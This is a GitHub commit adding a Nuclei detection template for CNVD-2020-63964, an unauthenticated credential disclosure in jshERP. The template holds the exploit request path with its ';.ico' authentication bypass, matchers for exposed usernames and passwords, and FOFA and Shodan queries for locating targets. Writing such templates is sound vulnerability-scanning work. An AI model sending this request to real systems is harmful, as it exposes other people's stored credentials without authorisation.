Merge pull request #7546 from projectdiscovery/CNVD-2020-63964

Create CNVD-2020-63964.yaml
patch-1
pussycat0x 2023-06-26 10:51:40 +05:30 committed by GitHub
commit ec5001968b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CNVD-2020-63964
info:
name: jshERP - Information Disclosure
author: brucelsone
severity: high
description: |
jshERP that can reveal sensitive information including system credentials without credentials.
reference:
- https://cn-sec.com/archives/1798444.html
metadata:
max-request: 1
fofa-query: jshERP-boot
shodan-query: http.favicon.hash:-1298131932
tags: cnvd,cnvd2022,jsherp,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"
matchers-condition: and
matchers:
- type: word
words:
- '"username":'
- '"loginName":'
- '"password":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200